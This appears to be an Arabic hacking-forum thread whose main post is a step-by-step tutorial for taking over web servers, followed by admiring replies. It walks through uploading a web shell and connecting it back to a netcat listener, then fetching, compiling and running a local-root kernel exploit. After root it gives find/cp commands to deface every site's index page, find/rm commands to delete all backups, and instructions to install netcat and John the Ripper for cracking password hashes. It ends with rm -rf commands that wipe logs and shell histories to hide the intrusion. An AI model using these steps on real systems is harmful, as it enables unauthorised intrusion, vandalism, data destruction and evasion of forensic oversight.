سلسلة احتراف الروت: ماهو الروت وطريقة سحب الروت وما بعد الروت

[b]بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

يعتبر هذا الموضوع انشاء الله مرجع كامل للروت وايضا ساحة
لاضافة جميع افكار الاعضاء والموضوع راح ينقسم الى الاقسام التاليه

[COLOR=“Yellow”]الجزء الاول: ماهو الروت (What is root)[/COLOR]

[COLOR=“Yellow”]الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root)

الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)

الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact server Every way)

الجزء الخامس: الحصول على الروت (Get to root)

الجزء السادس: ماذا بعد الروت (What happens after root)[/COLOR] ويشمل :

[+] تغيير جميع الاندكسات على السيرفر
[+] حذف جميع ملفات الباك اب على السيرفر
[+] تركيب النت كات على سيرفر والاتصال من سيرفر الى اخر
[+] تنصيب برمانج جوهن

[COLOR=“Yellow”]الجزء السابع : مسح اثارك من السيرفر (Clear all tracks)[/COLOR]


[COLOR=“Yellow”]الجزء الاول: ماهو الروت (What is root)[/COLOR]

الروت: تعتبر هذه الصلاحيخ من اعلى الصلاحيات التي يستطيع الشخص الحاصل عليها
بالتحكم الكامل بالسيرفر مثل اختراق جميع مواقع السيرفر
وسحب الدومينات وغيرها يعني ملخص الروت هو السيرفر يصبح بيدك بالكامل

[COLOR=“Yellow”]الجزء الثاني: كيف يمكن الحصول على الروت (How can I get on the root)

هناك عدة طريق للحصول على صلاحية الروت ومنها :

1- استعمال اللوكال روت
ونقصد بيه استغلال ثغرة موجودة بكيرنل السيرفر وكلا على حسب اصدار الكيرنل

2- استغلال ثغرات برامج السيرفر
ونقصد به السيرفر مركب برامج طبعا كل سيرفر بيه برامج وقد يصاب
احد هذه البرامج بثغرة مثل ثغرة البفر اوفر فلو
فنقوم باستغلال هذه الثغرة حتى الوصول الى الى صلاحية الروت

3- قرائة ملفات يتواجد بيه باسورد الروت

الجزء الثالث: اللوكل روت وكيف البحث عنة (local root and how to search for him)

اللوكال هو برنامج مبرمج بلغة c يقوم باستغلال ثغرات الكيرنل
وهناك لوكلات مرتجمة وغير مترجة ونفرق بينهما عن طريق الامتداد
فاذا كان الامتداد c فيعني اللوكال غير مترجم ا
اما اذا كان امتداد اخر غيره فيعني اللوكال مترجم

الجزء الرابع: اتصال بلسيرفر بكل الطريق (Contact server Every way)

بعد ما حصلنا على اللوكال اني جاء وقت الاتصال بالسيرفر واستعمال اللوكال
وطبعا طرق الاتصال بالسيرفر كثيرة وشروحات لها بالمنتديات ايضا كثيرة
واغلبها تتطلب فتح بروت والاتصال عن طريق النت كات اغلب الاشخاص ما تنجح هذه الطريقة
فراح اشرح طريقة وهي ايضا مشروحة وهي الاتصال عن طريق النت كات لاك بدون فتح بورت
اولا تعمل حساب بموقع ريلاكس واكو شورحات توضح طريقة الحصول على الحساب
والان بعد الحصول على الحساب يمكنك ان تتصل وانشاء اتصال VPN
نبدء الشرح :

اول تحمل اداة النت كات

http://www.4shared.com/file/Y24T3K5i/netcat.html 

بعد ما نفك الضغط عنها ننقلخا للهارد سي
ونرفع شل يدعك الاتصال بالسيرفر مثل r57 or Egy_Spider
بعد ما رفعنا الشل نروح لموجة الاوامر عن طريق

start >> run >> cmd   

ندخل الامر /cd للدخول على هارد السي
ثم ندخل حافظة النت كات بالامر cd netcat
ثم نروح لموقع

http://www.ip-adress.com/

حتى نطلع الايب بتاعنا
بعدها نروح لاخر الشل المرفوع نجد خانات نروح على الخانة الثانيه ونضع المعلومات فيها
1-ip لي احنة طلعناة من الموقع لي فوق
2-البورت وراح نستخدم بورت 443 البورت الخاص في اتصال ريلاكس
3-لانغير شيء
4-اتركه لاتضغط عليه

نرجع الى النت كات
ونكتب الامر

nc -vlp port

مع تغير port
الى 443 بورت اتصال ريلاكس
الان نضغط انتر (enter)
ونذهب الى الشل ونضغط رقم اربعة وهو (Connect)
والغير قادر على الحصول على حساب ريلاكس يستطيع استعمال هذا اليرنامج proXPN موجود بالكوكل

الجزء الخامس: الحصول على الروت (Get to root)

بعد ما اتصلنة بلسيرفر ووجدنة اللوكل المناسب الان نريد سحب الروت على السيرفر
اول شيء لحصول على الروت هو سحب لوكل على الموقع ويقصد ان يكون المجلد يحمل تصريح 777
ويسحب اللوكل بامر

wegt www.xxx.com/localroot.zip

wegt<<<الامر السحب
www.xxx.com/local.zip<<<موقع لوكل او انتة ترفع لوكل على اي موقع مجاني ويفض لوكل بمتداد zip
الان تم السحب
نفق الضغط بامر

unzip local.zip

unzip<<<امر فك الضغط
local.zip<<<اسم لوكل مع الامتداد

الان نعطي لوكل تصريح 777 بامر

chmod 777 local.c

chmod<<<امر تغير تصريح اي ملف
777<<<رقم التصريح
local.c<<<لوكل

بعد ذلك نترجم اللوكل بامر التالي

gcc local.c –o local

بعد سوف تجد لوكل بدون امتداد هكذا
local
بعد ذلك نعطي اللوكل المترجم تصريح 777 بامر التالي

chmod 777 local

بعد ذلك نشغل اللوكل بامر

local ./

وسوف يشتغل لوكل
نقوم بتنفيذ الامر التالي لرؤية الاصلاحية الان
id
الان صلاحيتنة روت
ننفذ لامر التالي
su
لحصول على صلاحية روت كاملة

[COLOR=“yellow”]الجزء السادس: ماذا بعد الروت (What happens after root)[/COLOR]

بعد ما حصلنا على الان تقدر تعمل اي شي تحبه مثل تغير جميع اندكسات السيرفر او ما يسمي بماس ديفاس
تكدر تسحب جميع سي بنلات المواقع وتلغم وغيرها من الاشياء فلك الصلاحية بكل شي
الان راح نشرح بعض الاعمال الي راح نقوم بها بعد الروت

اولا : تغيير جميع الاندكسات على السيرفر

find / -name "index.*" -exec cp index.html {} ; 
find / -name "default.*" -exec cp index.html {} ; 

وتستطيع ان تنفذ الاوامر في مكان سواء بالجذر او بالمسار الحالي
لكن يجب وجود الاندكس للاختراق بنفس مسارك عن تبيطق الامر
يعد ما تغير الاندكسات راح تلاحظ ملكية الملف الى root
وهذه بعض الاوامر الي تسطيع من خلاها تغير ملكية جميع ملفات الاندكس

find / -name "index.*" -exec chown 99 index.html {} ; 
find / -name "default.*" -exec chown 99 index.html {} ;

ثانيا : حذف جميع ملفات الباك اب على السيرفر

find / -name "cpbackup*" -exec rm  {} ;
find / -name "backup*" -exec rm  {} ; 

فيتم البحث عن كل مجلدو وملف باسم cpbackup او backup
وعلامة النجمة * تعير اي شي بعد الاسم

ثالثا : تركيب النت كات على سيرفر والاتصال من سيرفر الى اخر

بالبداية ندخل على السيرفر بصلاحية الروت

ثم نسحب النت كات بالامر التالي

wget http://www.atrysk.com/mirror/unix/netcat/netcat-0.7.1.tar.gz

ثم نفك الضغط عنها بالامر التالي

tar -xzf netcat-0.7.1.tar.gz

بعدها ندخل الى مجلد النت مات بالامر التالي

cd netcat-0.7.1

ثم نقوم بتنصيب النت كات بالامر

./configure

بعدهااكتب make وضغط انتر وبهذا نكون قد نصبنا النت كات على السيرفر
ومن خلالها راح تكدر تتصل على اي سيرفر اخر

رابعا : تنصيب برمانج جوهن (John the Ripper)

والفائدة من تركيبه هي لفك الهاشات ويكو نطريقة فكه سريعة
وطبعا الربنامج معروف بقوة فكه للهاشات زلتنصيبه نتبع الاتي:

اول شي نتأكد من امر gcc شغال حتى نكدر نترجم الجوهن

gcc;
gcc: No input files

تمام شغال

بعدها ايضا نتأكد من امر Wegt اذا كان شغال

wget; 
wget: missing URL 
Usage: wget [OPTION]... ... 

Try `wget --help' for more options  

تمام ايضا شغال

الان نقوم بسحب برنامج الوجهن بالامر

wget http://www.openwall.com/john/b/john-1.6.tar.gz;

نتظر شوي حتى يكمل التحميل

بعد ذلك نفك الضغط عنه بواسطه الامر

 tar -zxvf

بعد الفك نقوم بالدخول لمجلد john-1.6 بالامر

cd john-1.6;

بعدها نتوجه لملف src لكي نقوم بعمليه التركيب
cd src;

الان بعد ما دخلنا لمجلد src نقوم بكتابة الامر

make generic;

حتى الان الشغل تمام وتم تثبيته بالنجاح الان نتوجهإلى مجلد run داخل مجلد john-1.6
بواسطه الامر

cd ../run;

ثم نكتب الامر

 ;ls

للتاكد من الملفات راح نجد ملف John ,john.ini وبعض الملفات

الان نشرح طريقة سحب ملفات الباسورد لفكها

اولا نسحبها لمجلد run ولنفرض سحبنا ملف اسمه password.txt
ننفذ امر الفك وهو

./john -i:all pass.txt;

ونتظر حتى يتم الفك وبعدها راح يظهرلك الباسورد بعد الفك
او تكتب هذا الامر لرؤيته

./john -show pass.txt;

وهنا بعد الشغلات تعملها وهي اعطاء تصريحات لبعض الاوامر

اولا نقوم بعمل صلاحيات على gcc لاستخدامها من قبل الرووت فقط

[root@D3VIL]chmod 700 /usr/bin/gcc

بوضع صلاحيات على wget لإستخدامه من قبل الرووت

[root@D3VIL]chmod 700 /usr/bin/wget

[/COLOR]

[COLOR=“Yellow”]الجزء السابع : مسح اثارك من السيرفر (Clear all tracks)[/COLOR]

بعد اخذ صلاحية الروت وعلمت الي بدك فلازم نقوم بمسح اثارك على السيرفر
لان يوجد ملف اسمه لوقل هو ملف يقوم بحفظ اي بي تبعك واثاراك على السيرفر
طيب لازم نمسه والطريقة هي بعض الاوامر نطبقها وهي :

rm -rf /tmp/logs  
 rm -rf $HISTFILE  
 rm -rf /root/.ksh_history  
 rm -rf /root/.bash_history 
  rm -rf /root/.ksh_history  
 rm -rf /root/.bash_logout  
  rm -rf /usr/local/apache/logs  
 rm -rf /usr/local/apache/log  
 rm -rf /var/apache/logs 
  rm -rf /var/apache/log 
  rm -rf /var/run/utmp 
  rm -rf /var/logs 
  rm -rf /var/log  
 rm -rf /var/adm  
 rm -rf /etc/wtmp  
 rm -rf /etc/utmp 
  find / -name *.bash_history -exec rm -rf {} 
   find / -name *.bash_logout -exec rm -rf {} 
   find / -name "log*" -exec rm -rf {} 
   find / -name *.log -exec rm -rf {} 

[/b]

دا تبدع …

شرح رائع فيه كل شئ عن الروت …

[b][b][color=blue]
2- استغلال ثغرات برامج السيرفر
ونقصد به السيرفر مركب برامج طبعا كل سيرفر بيه برامج وقد يصاب
احد هذه البرامج بثغرة مثل ثغرة البفر اوفر فلو
فنقوم باستغلال هذه الثغرة حتى الوصول الى الى صلاحية الروت

3- قرائة ملفات يتواجد بيه باسورد الروت[/color][/b][/b]
ملاحظة صغيرة

هنااا لازم البرنامج يكون بيتمتع ويشتغل تحت صلاحيات الروت كي تستطيع سحب الروت

إدا كان البرنامج لا يتمتع بصلاحيات الروت ماراح تقدر …

مجرد ملاحظة

بجد يعتبر موضوع شامل وجميل

بارك الله فيك

مبدع و فنان بصراحه سوبرمان

جميل يا اخي الغالي مبدع واصل على نهجك تحياتي

ماعساني ياأخي إلى أن أرفع القبعة لك
بارك الله فيك

[b]
آبدعت يا معلم !! , ~ …

يعطيك آلفين ع ــافية يارب ! , ~ …
[/b]

[color=blue]رابط [/color][color=blue]اداة النت كات غير موجود
[/color]

موضوع ممتاز
وياريت تكمل جميلك
ويبقى عملت الصح
وتدينى نبذة عن سحب الدومين